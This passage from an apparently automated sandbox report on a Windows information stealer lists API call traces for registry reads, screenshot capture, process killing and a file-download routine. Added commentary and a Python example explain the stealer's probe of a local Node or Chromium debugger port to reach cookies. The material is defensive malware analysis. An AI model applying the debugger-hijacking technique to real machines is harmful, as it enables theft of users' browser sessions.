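• RegOpenKeyExA.ADVAPI32(?,00D2C260,00000000,00020019,?), ref: 00E537BD
• RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00E537F7
• RegQueryValueExA.ADVAPI32(?,00D2F7B8,00000000,000F003F,?,?), ref: 00E538A1
APIs
• GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00E516A1
• ShellExecuteEx.SHELL32(?), ref: 00E517CD
• ExitProcess.KERNEL32 ref: 00E51803
APIs
• lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E5184F
• lstrlen.KERNEL32(00D16EC8), ref: 00E51860
• lstrcpy.KERNEL32(00000000,00000000), ref: 00E51887
• lstrcat.KERNEL32(00000000,00000000), ref: 00E51892
• lstrcpy.KERNEL32(00000000,00000000), ref: 00E518C1
• lstrlen.KERNEL32(00E64FA0), ref: 00E518D3
"""
```

Paste the whole "Execution Graph" text of a report into analyse() and the result maps each function's first ref address to its tags; the 0000001A and 00020019 arguments on this page decode to CSIDL_APPDATA and KEY_READ through decode_constants(). The 000F003F passed to RegQueryValueExA is not decoded on purpose: in that position it is the lpType pointer, not an access mask, even though its value happens to equal KEY_ALL_ACCESS.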
                              APIs
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E390DF
                              • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 00E390FC
                              • InternetCloseHandle.WININET(00000000), ref: 00E39109
                              • InternetReadFile.WININET(?,?,?,00000000), ref: 00E39166
                              • InternetReadFile.WININET(00000000,?,00001000,?), ref: 00E39197
                              • InternetCloseHandle.WININET(00000000), ref: 00E391A2
                              • InternetCloseHandle.WININET(00000000), ref: 00E391A9
                              • strlen.MSVCRT ref: 00E391BA
                              • strlen.MSVCRT ref: 00E391ED
                              • strlen.MSVCRT ref: 00E3922E
                              • strlen.MSVCRT ref: 00E3924C
                                • Part of subcall function 00E38980: std::_Xinvalid_argument.LIBCPMT ref: 00E38996
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                              • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                              • API String ID: 1530259920-2144369209
                              • Opcode ID: 22cafe83cc71afc7809fcfeb290eb7b7c99648088f056bde333201a4cd282f99
                              • Instruction ID: e9d9d1d5e3d8db443c57c22566ecca31aa8188a9162e630b00b3d35849e3c156
                              • Opcode Fuzzy Hash: 22cafe83cc71afc7809fcfeb290eb7b7c99648088f056bde333201a4cd282f99
                              • Instruction Fuzzy Hash: C851D171640305ABD720DBA8EC49BEEBBF9DB48710F141569F904F3281DBB59A48C7A1
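The function at 00E390C0 fetches http://localhost:9229/json and, judging by the string constants `"webSocketDebuggerUrl":` and `"ws://` in this block and the `/devtools`, `ws://localhost:9229` and `cookies` strings in the block at 00E39547, scans the reply for a WebSocket debugger URL. Port 9229 is the default Node.js inspector port, and a Chromium-based browser or Electron application started with a remote-debugging port serves the same /json target list. The block below is an added example, not code from the report or from the sample, and it covers both blocks: it builds a constructed target list in that well-known format (ids, titles and page URL are made up), extracts the URL the way the string constants suggest (a substring scan) and the proper way (parsing the JSON), and classifies each target by loopback host and path shape. Nothing here connects to a debugger; the point is to show what the probe is looking for and what a defender should be surprised to find listening.

```python
"""What the http://localhost:9229/json probe in this report is looking for:
the DevTools/inspector target list and the webSocketDebuggerUrl field in it."""
import json
from urllib.parse import urlsplit

# Constructed reply in the standard DevTools-protocol /json target-list format.
# A real debuggee differs only in ids, titles and URLs.
SAMPLE_JSON = json.dumps([
    {"description": "node.js instance", "id": "3f1c2a9e-0000-4000-8000-000000000001",
     "title": "app.js", "type": "node",
     "webSocketDebuggerUrl": "ws://localhost:9229/3f1c2a9e-0000-4000-8000-000000000001"},
    {"description": "", "id": "ABCD", "title": "Inbox", "type": "page",
     "url": "https://mail.example/",
     "webSocketDebuggerUrl": "ws://localhost:9229/devtools/page/ABCD"},
])

def extract_ws_urls_naive(body: str) -> list[str]:
    """Substring scan matching the two constants in the report: locate the
    '"webSocketDebuggerUrl":' key, then the '"ws://' value that follows it."""
    urls, pos = [], 0
    while (key := body.find('"webSocketDebuggerUrl":', pos)) != -1:
        start = body.find('"ws://', key)
        if start == -1:
            break
        end = body.find('"', start + 1)
        if end == -1:
            break
        urls.append(body[start + 1:end])
        pos = end
    return urls

def extract_ws_urls_json(body: str) -> list[str]:
    """The same result obtained properly: parse the list and read the field."""
    return [t["webSocketDebuggerUrl"] for t in json.loads(body) if "webSocketDebuggerUrl" in t]

def describe_target(ws_url: str) -> str:
    """Loopback check plus path shape: '/devtools/page/<id>' is the Chromium-style
    page target, a bare '/<uuid>' path is the Node inspector style."""
    u = urlsplit(ws_url)
    if u.scheme != "ws" or u.hostname not in ("localhost", "127.0.0.1"):
        return "not a loopback debugger endpoint"
    if u.path.startswith("/devtools/page/"):
        return f"chromium page target on port {u.port}"
    return f"inspector target on port {u.port}"
```

On a host you defend, anything answering on 127.0.0.1:9229/json (or the Chromium default 9222) is a debugger that has full control of the debuggee, including its cookie store in the browser case; the two extraction routines agree on the constructed reply, which is why a stealer gets away with plain substring matching instead of a JSON parser.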
                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 00E516A1
                              • lstrcpy.KERNEL32(00000000,00D1A6E0), ref: 00E516CC
                              • lstrlen.KERNEL32(?), ref: 00E516D9
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E516F6
                              • lstrcat.KERNEL32(00000000,?), ref: 00E51704
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5172A
                              • lstrlen.KERNEL32(00D2F0A0), ref: 00E5173F
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E51762
                              • lstrcat.KERNEL32(00000000,00D2F0A0), ref: 00E5176A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E51792
                              • ShellExecuteEx.SHELL32(?), ref: 00E517CD
                              • ExitProcess.KERNEL32 ref: 00E51803
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                              • String ID: <
                              • API String ID: 3579039295-4251816714
                              • Opcode ID: d6a1695d8716e5b7e37980e7fd5a1d44b63c203a550cc95ff1b9b2888567e3a0
                              • Instruction ID: 9df2b5fbfa3c056858771293a814ee94f2ec12ed1c80d67e48b61a96dc307331
                              • Opcode Fuzzy Hash: d6a1695d8716e5b7e37980e7fd5a1d44b63c203a550cc95ff1b9b2888567e3a0
                              • Instruction Fuzzy Hash: 7351D670901319DFDB21DFA8C888B9EBBF9AF48305F00546AEA45F3255DB35AE05CB90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4EFE4
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4F012
                              • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00E4F026
                              • lstrlen.KERNEL32(00000000), ref: 00E4F035
                              • LocalAlloc.KERNEL32(00000040,00000001), ref: 00E4F053
                              • StrStrA.SHLWAPI(00000000,?), ref: 00E4F081
                              • lstrlen.KERNEL32(?), ref: 00E4F094
                              • lstrlen.KERNEL32(00000000), ref: 00E4F0B2
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4F0FF
                              • lstrcpy.KERNEL32(00000000,ERROR), ref: 00E4F13F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen$AllocLocal
                              • String ID: ERROR
                              • API String ID: 1803462166-2861137601
                              • Opcode ID: 03520d0a35d30c8f6c5c2ac7f5674002b77878bb9dc8beb2649cfdf228440315
                              • Instruction ID: 3ca12e0af2df077f54cbc5441f02bcb1bee90ba7944e6286732b433bdce1503c
                              • Opcode Fuzzy Hash: 03520d0a35d30c8f6c5c2ac7f5674002b77878bb9dc8beb2649cfdf228440315
                              • Instruction Fuzzy Hash: 1D51AF319112059FCB31AF78E849AAE7BE4AF84744F05616DF98ABB316DB31DC01CB90
                              APIs
                              • GetEnvironmentVariableA.KERNEL32(00D28938,01069BD8,0000FFFF), ref: 00E3A026
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E3A053
                              • lstrlen.KERNEL32(01069BD8), ref: 00E3A060
                              • lstrcpy.KERNEL32(00000000,01069BD8), ref: 00E3A08A
                              • lstrlen.KERNEL32(00E64C4C), ref: 00E3A095
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A0B2
                              • lstrcat.KERNEL32(00000000,00E64C4C), ref: 00E3A0BE
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A0E4
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00E3A0EF
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E3A114
                              • SetEnvironmentVariableA.KERNEL32(00D28938,00000000), ref: 00E3A12F
                              • LoadLibraryA.KERNEL32(00D16340), ref: 00E3A143
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                              • String ID:
                              • API String ID: 2929475105-0
                              • Opcode ID: 0c2c914e0b680171e48838c659a908b5598cb530cf9372402ca6e7be6d525b26
                              • Instruction ID: a5470342d11e55688d194bb37baeefe4f2b8d5c6be82de29b8b9d944b2164d73
                              • Opcode Fuzzy Hash: 0c2c914e0b680171e48838c659a908b5598cb530cf9372402ca6e7be6d525b26
                              • Instruction Fuzzy Hash: A691D4716007009FD7309FA4D84CA673FF5EB54708F58A429E5C5AB666EB7ACC80CB92
                              APIs
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4C8A2
                              • lstrcpy.KERNEL32(00000000,00E5CFEC), ref: 00E4C8D1
                              • lstrlen.KERNEL32(00000000), ref: 00E4C8FC
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 00E4C932
                              • StrCmpCA.SHLWAPI(00000000,00E64C3C), ref: 00E4C943
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrlen
                              • String ID:
                              • API String ID: 367037083-0
                              • Opcode ID: 754b66280d6cae349ca768acc47edbf6d31d23fe8d418b15cf3af5bde1e07223
                              • Instruction ID: 5e850aca9c5bf2884bcedc92b288fc642a622e0f2fdc2746b4d284c8291d9cfe
                              • Opcode Fuzzy Hash: 754b66280d6cae349ca768acc47edbf6d31d23fe8d418b15cf3af5bde1e07223
                              • Instruction Fuzzy Hash: 1F61D871D023199FDB60DFB4D848AAE7BF8AF09348F206569E982F7201D735D945CBA0
                              APIs
                              • memset.MSVCRT ref: 00E5451A
                              • GetProcessHeap.KERNEL32(00000000,000000FA,00000000,?,?,?,00E44F39), ref: 00E54545
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00E5454C
                              • wsprintfW.USER32 ref: 00E5455B
                              • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 00E545CA
                              • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 00E545D9
                              • CloseHandle.KERNEL32(00000000,?,?), ref: 00E545E0
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                              • String ID: 9O$%hs$9O
                              • API String ID: 3729781310-2037051700
                              • Opcode ID: c5868fd33560ff40eceb144d44734f95b0490fb6cdd56efbde1187195e465739
                              • Instruction ID: 6c8e3a337b56def945d5c94b3808edc2e6d050206ee57256dbb32e5372175983
                              • Opcode Fuzzy Hash: c5868fd33560ff40eceb144d44734f95b0490fb6cdd56efbde1187195e465739
                              • Instruction Fuzzy Hash: EC319EB2A00205BFEB20DBA0DC49FDEB778AF44705F104455FA05A7184EB75AA458BA5
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00E50CF0), ref: 00E54276
                              • GetDesktopWindow.USER32 ref: 00E54280
                              • GetWindowRect.USER32(00000000,?), ref: 00E5428D
                              • SelectObject.GDI32(00000000,00000000), ref: 00E542BF
                              • GetHGlobalFromStream.COMBASE(00E50CF0,?), ref: 00E54336
                              • GlobalLock.KERNEL32(?), ref: 00E54340
                              • GlobalSize.KERNEL32(?), ref: 00E5434D
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                              • String ID:
                              • API String ID: 1264946473-0
                              • Opcode ID: 971e47e717eb89542b9e1bdf3c6e53b9d54d37edc0900e1b59a5a40368e0bb16
                              • Instruction ID: 436d03ae0d6311f9c2e7413152a886acb4a6542d6b0b6f34ae084ec249faaeaf
                              • Opcode Fuzzy Hash: 971e47e717eb89542b9e1bdf3c6e53b9d54d37edc0900e1b59a5a40368e0bb16
                              • Instruction Fuzzy Hash: 02514175910208AFDB20DFA4DC89EEE7BB9EF48305F105419FA45E3254DB35AE45CBA0
                              APIs
                              • lstrcat.KERNEL32(?,00D2F320), ref: 00E4E00D
                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 00E4E037
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E06F
                              • lstrcat.KERNEL32(?,00000000), ref: 00E4E07D
                              • lstrcat.KERNEL32(?,?), ref: 00E4E098
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0AC
                              • lstrcat.KERNEL32(?,00D1A5F0), ref: 00E4E0C0
                              • lstrcat.KERNEL32(?,?), ref: 00E4E0D4
                              • lstrcat.KERNEL32(?,00D2E458), ref: 00E4E0E7
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E4E11F
                              • GetFileAttributesA.KERNEL32(00000000), ref: 00E4E126
                              Memory Dump Source
                              • Source File: 00000000.00000002.2265015432.0000000000E31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E30000, based on PE: true
                               • Associated: 00000000.00000002.2264990775.0000000000E30000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000E67000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EBE000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EC6000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000000EDF000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265015432.0000000001068000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265451745.000000000107A000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000107C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001204000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.00000000012DA000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.0000000001303000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000130C000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265481846.000000000131B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2265873467.000000000131C000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266017833.00000000014B3000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2266043003.00000000014B4000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_e30000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$AttributesFileFolderPath
                              • String ID:
                              • API String ID: 4230089145-0
                              • Opcode ID: 225be4cd3bf93f490067f5c622a50cb1ec2d4f8e643db74e0dd7d7de7bd053dc
                              • Instruction ID: f88ac64a0db11b52e54fd71c6caf6f32107ee872031e26d6f2d10bc9f745fcac
                              • Opcode Fuzzy Hash: 225be4cd3bf93f490067f5c622a50cb1ec2d4f8e643db74e0dd7d7de7bd053dc
                              • Instruction Fuzzy Hash: 4161BD7191021CAFDB21DB64D848ADDB7B8BF48300F1059A8F68AA3351DB74AF85DF90
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00E36AFF
                              • InternetOpenA.WININET(00E5CFEC,00000001,00000000,00000000,00000000), ref: 00E36B2C
                              • StrCmpCA.SHLWAPI(?,00D2FAE0), ref: 00E36B4A
                              • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,-00800100,00000000), ref: 00E36B6A
                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000002,00000080,00000000), ref: 00E36B88
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E36BA1
                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00E36BC6
                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 00E36BF0
                              • CloseHandle.KERNEL32(00000000), ref: 00E36C10
                              • InternetCloseHandle.WININET(00000000), ref: 00E36C17
                              • InternetCloseHandle.WININET(?), ref: 00E36C21
                              Memory Dump Source
